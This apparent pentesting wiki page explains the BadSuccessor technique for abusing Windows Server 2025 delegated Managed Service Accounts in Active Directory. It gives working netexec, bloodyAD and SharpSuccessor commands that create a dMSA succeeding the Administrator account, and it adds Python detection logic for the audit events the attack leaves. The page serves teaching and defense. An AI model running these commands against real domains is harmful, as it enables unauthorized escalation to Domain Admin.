# BadSuccessor (dMSA abuse)

## Theory

In Windows Server 2025, Microsoft introduced [delegated Managed Service Accounts (dMSAs).](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/delegated-managed-service-accounts/delegated-managed-service-accounts-overview) A dMSA is a new type of service account in Active Directory (AD) that expands on the capabilities of [group Managed Service Accounts](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/group-managed-service-accounts/group-managed-service-accounts/group-managed-service-accounts-overview) (gMSAs).

If we hold **`GenericAll`**, **`CreateChild`**, **`WriteDACL`**, or **`WriteOwner`** permissions on *any* OU (enough to create a dMSA object inside it), or can modify an existing dMSA, we can escalate from low-privileged access to full Domain Admin via the **BadSuccessor** technique: the new dMSA is marked as the successor of a privileged account, and it inherits that account's privileges once the domain controller treats the migration as complete.

{% hint style="success" %}
**Exploiting this vector does not require the domain to actively use dMSAs.** The feature is automatically enabled in any domain that includes at least one Windows Server 2025 domain controller, and its presence alone is enough to make the attack path viable.
{% endhint %}

## Practice

{% tabs %}
{% tab title="UNIX-like" %}
[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to enumerate whether a target is vulnerable to the BadSuccessor attack.

```bash
netexec ldap $DC_IP -u $USER -p $PASSWORD -M badsuccessor
```

We can then exploit it using [BloodyAd](https://github.com/CravateRouge/bloodyAD) (Python).

```bash
# Enumerate writable attributes for the user we are authenticating as
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN get writable --detail

# BadSuccessor attack to create the dMSA object called dmsa_pwn
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN add badSuccessor dmsa_pwn
```

{% endtab %}

{% tab title="Windows" %}
You can use the [Get-BadSuccessorOUPermissions.ps1](https://github.com/akamai/BadSuccessor) script to identify whether a target is vulnerable to the BadSuccessor attack.

```powershell
.\Get-BadSuccessorOUPermissions.ps1
```

[SharpSuccessor](https://github.com/logangoins/SharpSuccessor) (C#) can then be used to exploit it.

```powershell
# /path: the OU that the user has access to
# /account: account that has enough permissions on the OU
# /name: name of the dMSA object that will be created
# /impersonate: existing account the new dMSA is declared the successor of
.\SharpSuccessor.exe add /path:"ou=badOU,dc=domain,dc=local" /account:$USERNAME /name:dmsa_pwned /impersonate:Administrator
```

{% endtab %}
{% endtabs %}
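From the defender's side, as an added example that is not part of the original page or of any tool above: detection logic for the two indicators this technique leaves in Directory Service auditing, a dMSA object being created (event 5137) and `msDS-ManagedAccountPrecededByLink` being set on it (event 5136). The sample events, the `svc-adadmin` allow-listed account and the `dmsa_pwn`/`badOU` names are constructed for the example.

```python
"""Detect BadSuccessor indicators in Directory Service audit events.
Field names follow Windows Security events 5137 (object created) and 5136
(object modified); both require "Audit Directory Service Changes" auditing.
"""

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
PRECEDED_BY = "msDS-ManagedAccountPrecededByLink"  # links dMSA to predecessor
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"

# Constructed sample events (not captured from a real domain).
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "jdoe", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=dmsa_pwn,OU=badOU,DC=domain,DC=local"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=dmsa_pwn,OU=badOU,DC=domain,DC=local",
     "AttributeLDAPDisplayName": PRECEDED_BY, "OperationType": VALUE_ADDED,
     "AttributeValue": "CN=Administrator,CN=Users,DC=domain,DC=local"},
    # Expected migration work by the allow-listed admin account: no alert.
    {"EventID": 5137, "SubjectUserName": "svc-adadmin", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=web-dmsa,OU=Services,DC=domain,DC=local"},
    # Unrelated attribute change on the rogue dMSA: no alert on its own.
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=dmsa_pwn,OU=badOU,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED,
     "AttributeValue": "test"},
]

def find_dmsa_abuse(events, allowed_creators=frozenset({"svc-adadmin"})):
    """Return one finding per event matching a BadSuccessor indicator.

    Rule 1: a dMSA object is created by an account outside the allow-list.
    Rule 2: msDS-ManagedAccountPrecededByLink gains a value, declaring the
            dMSA the successor of the account named in AttributeValue, whose
            privileges the dMSA will inherit once migration completes.
    """
    findings = []
    for ev in events:
        if ev.get("ObjectClass") != DMSA_CLASS:
            continue
        actor, dn = ev.get("SubjectUserName"), ev.get("ObjectDN")
        if ev["EventID"] == 5137 and actor not in allowed_creators:
            findings.append({"rule": "dmsa-created-by-non-admin",
                             "actor": actor, "object": dn, "predecessor": None})
        elif (ev["EventID"] == 5136
              and ev.get("AttributeLDAPDisplayName") == PRECEDED_BY
              and ev.get("OperationType") == VALUE_ADDED):
            findings.append({"rule": "dmsa-predecessor-link-set", "actor": actor,
                             "object": dn, "predecessor": ev.get("AttributeValue")})
    return findings
```

Events 5136/5137 are only generated for OUs that carry a SACL auditing object creation and attribute writes, so the audit policy and SACL on OUs holding service accounts are the prerequisite for this rule to fire.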

## Resources

{% embed url="https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory" %}

{% embed url="https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/" %}
